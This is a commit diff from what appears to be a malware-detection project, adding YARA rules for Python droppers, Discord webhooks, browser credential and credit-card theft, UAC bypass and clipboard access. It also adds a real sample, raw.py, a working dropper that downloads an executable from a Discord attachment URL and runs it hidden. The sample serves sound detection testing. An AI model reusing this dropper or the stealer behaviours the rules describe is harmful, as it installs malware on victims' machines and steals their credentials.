Rule improvements from GitHub Search Manipulation analysis (chainguar…

…d-dev#120)

* Rule improvements from GitHub Search Manipulation analysis

* Remove commented out string

* Improve the accuracy of the Python dropper rules

* Fix typo

* CRLF -> LF

* Add more browser secret rules

rules/combo/dropper/python.yara

@@ -1,14 +1,19 @@
 rule http_open_write_system : suspicious {
+  meta:
+  	description = "may fetch and execute programs from the internet"
   strings:
 	$http = "http"
-	$h_rget = "requests.get"
+	$http_requests = "requests.get" fullword
+	$http_urrlib = "urllib.request" fullword
+	$http_urlopen = "urlopen" fullword
 
 	$open = "open("
 
 	$write = "write("
 
-	$system = "os.system("
-	$sys_popen = "os.popen"
+	$system = "os.system" fullword
+	$sys_popen = "os.popen" fullword
+	$sys_sub = "subprocess" fullword
   condition:
     filesize < 16384 and any of ($h*) and $open and $write and any of ($sys*)
 }
@@ -18,9 +23,16 @@ rule setuptools_dropper : critical {
 		description = "setuptools script that downloads and executes content"
 	strings:
 		$setup = "setup("
-		$setuptools = "setuptools"
-		$requests = "requests.get"
-		$os_sys = "os.system"
+		$setuptools = "setuptools" fullword
+
+		$http_requests = "requests.get" fullword
+		$http_urrlib = "urllib.request" fullword
+		$http_urlopen = "urlopen" fullword
+
+		$system = "os.system" fullword
+		$sys_popen = "os.popen" fullword
+		$sys_sub = "subprocess" fullword
+
 	condition:
-		all of them
+		all of ($setup*) and any of ($http*) and any of ($sys*)
 }

rules/exec/program.yara

@@ -2,7 +2,7 @@ rule execall : notable {
 	meta:
 		syscall = "execve"
 		pledge = "exec"
-		description = "executes another program"
+		description = "executes external programs"
 	strings:
 		$execl = "execl" fullword
 		$execle = "execle" fullword
@@ -20,7 +20,7 @@ rule execve : notable {
 	meta:
 		syscall = "execve"
 		pledge = "exec"
-		description = "executes another program"
+		description = "executes external programs"
 	strings:
 		$execve = "execve" fullword
 		$go = "syscall.libc_execve_trampoline"
@@ -33,7 +33,7 @@ rule exec_cmd_run : notable {
 	meta:
 		syscall = "execve"
 		pledge = "exec"
-		description = "executes another program"
+		description = "executes external programs"
 	strings:
 		$ref = "exec.(*Cmd).Run"
 		$ref2 = ").CombinedOutput"
@@ -46,7 +46,7 @@ rule perl_system : notable {
 	meta:
 		syscall = "execve"
 		pledge = "exec"
-		description = "executes another program"
+		description = "executes external programs"
 	strings:
 		$ref = "system("
 	condition:
@@ -58,7 +58,7 @@ rule subprocess : notable {
 	meta:
 		syscall = "execve"
 		pledge = "exec"
-		description = "executes another program"
+		description = "executes external programs"
 	strings:
 		$naked = "subprocess"
 		$val = /subprocess\.\w{1,16}[\(\"\/\w\'\.\- \,\[\]]{0,64}/

rules/exfil/discord.yara

@@ -1,10 +1,10 @@
 
 rule discord_bot : suspicious {
   meta:
+	description = "Uses the Discord webhooks API"
     ref = "https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_suspicious.yar#L706"
   strings:
     $s1 = "discord.com/api/webhooks"
-    $s2 = "cdn.discordapp.com/attachments"
   condition:
     any of them
 }

rules/fs/tempdir-create.yara

@@ -1,7 +1,7 @@
 
 rule mkdtemp {
 	meta:
-		description = "Uses libc functions to create a temporary directory"
+		description = "creates temporary directory"
 		pledge = "wpath"
 	strings:
 		$mkdtemp = "mkdtemp" fullword

rules/fs/tempdir.yara

@@ -0,0 +1,12 @@
+
+rule tempdir {
+	meta:
+		description = "looks up location of temp directory"
+		pledge = "wpath"
+	strings:
+		$gettempdir = "gettempdir" fullword
+		$tempdir = "TEMPDIR" fullword
+		$tmpdir = "TMPDIR" fullword
+	condition:
+		any of them
+}

rules/malware/family/skuld.yara

@@ -0,0 +1,10 @@
+rule stealthworker : critical {
+	meta:
+		description = "Skuld stealer: https://github.com/hackirby/skuld/blob"
+		ref = "https://github.com/hackirby/skuld"
+	strings:
+		$ref = "skuld" fullword
+		$wallet = "walletsinjection" fullword
+	condition:
+		all of them
+}

rules/privesc/uac_bypass.yara

@@ -0,0 +1,10 @@
+
+rule uac_bypass : suspicious {
+  meta:
+    description = "may bypass UAC (User Account Control)"
+  strings:
+	$uacbypass = "uacbypass" fullword
+	$delegate = "fodhelper" fullword
+  condition:
+	any of them
+}

rules/process/list.yara

@@ -42,6 +42,7 @@ rule proclist : medium {
 		description = "accesses process list"
 	strings:
 		$proclist = "proclist" fullword
+		$gops = "shirou/gopsutil"
 	condition:
 		any of them
 }

rules/secrets/chromium_credit_cards.yara

@@ -0,0 +1,11 @@
+rule chromium_master_password : suspicious {
+	meta:
+		description = "Gets Chromium credit card information"
+	strings:
+		$web_data = "Web Data"
+		$encrypted_key = "credit_cards"
+		$c = "Chrome"
+		$c2 = "Chromium"
+	condition:
+		any of ($c*) and $web_data and $encrypted_key
+}

rules/secrets/chromium_master_password.yara

@@ -0,0 +1,10 @@
+rule chromium_master_password : suspicious {
+	meta:
+		description = "Decrypts Chromium master password"
+	strings:
+		$local_state = "Local State"
+		$encrypted_key = "encrypted_key" 
+		$os_crypt = "os_crypt"
+	condition:
+		all of them
+}

rules/secrets/firefox-master_password.yara

@@ -0,0 +1,9 @@
+rule firefox_master_password : suspicious {
+	meta:
+		description = "Decrypts Firefox master password"
+	strings:
+		$firefox = "Firefox"
+		$nssPrivate = "nssPrivate"
+	condition:
+		all of them
+}

rules/ui/clipboard.yara

@@ -1,10 +1,13 @@
 rule nspasteboard : notable macos {
   meta:
 	ref = "https://www.sentinelone.com/blog/session-cookies-keychains-ssh-keys-and-more-7-kinds-of-data-malware-steals-from-macos-users/"
-	description = "Accesses macOS clipboard conetnts"
+	description = "Accesses clipboard contents"
   strings:
-	$ref = "NSPasteboard" fullword
-	$ref2 = "pbpaste" fullword
+	$pb1 = "NSPasteboard" fullword
+	$pb2 = "pbpaste" fullword
+
+	$lib = "golang.design/x/clipboard"
+	$lib2 = "atotto/clipboard"
   condition:
-    all of them
+	all of ($pb*) or any of ($lib*)
 }

samples/Python/2023.JokerSpy/shared.dat.simple

@@ -1,10 +1,12 @@
 # Python/2023.JokerSpy/shared.dat
+combo/dropper/python
 combo/recon/system_network
 encoding/base64
 evasion/base64/decode
 evasion/codecs_decode
 exec/program
 fs/file/read
+fs/tempdir
 kernel/uname/get
 net/interface/list
 net/url/request

samples/Windows/2024.GitHub.Clipper/main.exe.simple

@@ -0,0 +1,72 @@
+# Windows/2024.GitHub.Clipper/main.exe
+archives/zip
+combo/net/scan_tool
+combo/stealer/browser
+combo/stealer/creds
+combo/stealer/discord
+combo/stealer/office
+combo/stealer/wallet
+compression/gzip
+crypto/aes
+crypto/ecdsa
+crypto/ed25519
+crypto/tls
+databases/sqlite
+encoding/base64
+encoding/json
+encoding/json/decode
+encoding/json/encode
+env/TEMP
+env/TERM
+exec/program
+exfil/discord
+fs/directory/list
+fs/file/read
+fs/permission/chown
+fs/permission/modify
+kernel/cpu/info
+malware/family/skuld
+net/dns
+net/dns/txt
+net/download
+net/geoip
+net/hostname/resolve
+net/http/accept/encoding
+net/http/auth
+net/http/cookies
+net/http/post
+net/http/request
+net/http2
+net/http_proxy
+net/ip/parse
+net/mac/address
+net/public_ip
+net/sendfile
+net/socket/listen
+net/socket/local/address
+net/socket/peer/address
+net/socket/receive
+net/socket/send
+net/udp/receive
+net/udp/send
+net/upload
+net/url
+net/url/request
+net/vnc
+privesc/uac_bypass
+process/list
+ref/extensions/office
+ref/path/etc
+ref/path/etc/hosts
+ref/path/etc/resolv.conf
+ref/site/download
+ref/site/github_raw
+ref/site/http/dynamic
+ref/site/url
+ref/words/password
+secrets/chromium_credit_cards
+secrets/chromium_master_password
+secrets/firefox/cookies
+secrets/firefox/master_password
+secrets/private_key
+ui/clipboard

samples/Windows/2024.GitHub.Clipper/raw.py

@@ -0,0 +1,20 @@
+import requests
+import os
+import uuid
+import tempfile
+import subprocess
+
+url = "https://cdn.discordapp.com/attachments/1222129364288671834/1224848705887404072/main.exe?ex=661efc40&is=660c8740&hm=84680cfd5f4b04386b135463a79ba811bbe3a662e794aa69b4da9d33065602a0&"
+temp = tempfile.gettempdir()
+
+name = os.path.join(temp, str(uuid.uuid4()) + ".exe")
+
+response = requests.get(url)
+
+if response.status_code == 200:
+    with open(name, 'wb') as dosya:
+        dosya.write(response.content)
+
+    subprocess.Popen([name], creationflags=subprocess.CREATE_NO_WINDOW, shell=True)
+else:
+    exit

samples/Windows/2024.GitHub.Clipper/raw.py.simple

@@ -0,0 +1,7 @@
+# Windows/2024.GitHub.Clipper/raw.py
+combo/dropper/python
+exec/program
+fs/tempdir
+net/url/request
+ref/site/download
+ref/site/url

samples/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md

@@ -14,7 +14,7 @@ Overall risk: 🔥 3/HIGH
 |          |                         | tcsetattr                                           |
 |          |                         | upload"                                             |
 | 2/MEDIUM | device/pseudo_terminal  | pseudo-terminal access functions                    |
-| 2/MEDIUM | exec/program            | executes another program                            |
+| 2/MEDIUM | exec/program            | executes external programs                          |
 | 2/MEDIUM | kernel/uname/get        | get system identification (uname)                   |
 | 2/MEDIUM | net/download            | downloads files                                     |
 | 2/MEDIUM | net/ip/parse            | parses IP address                                   |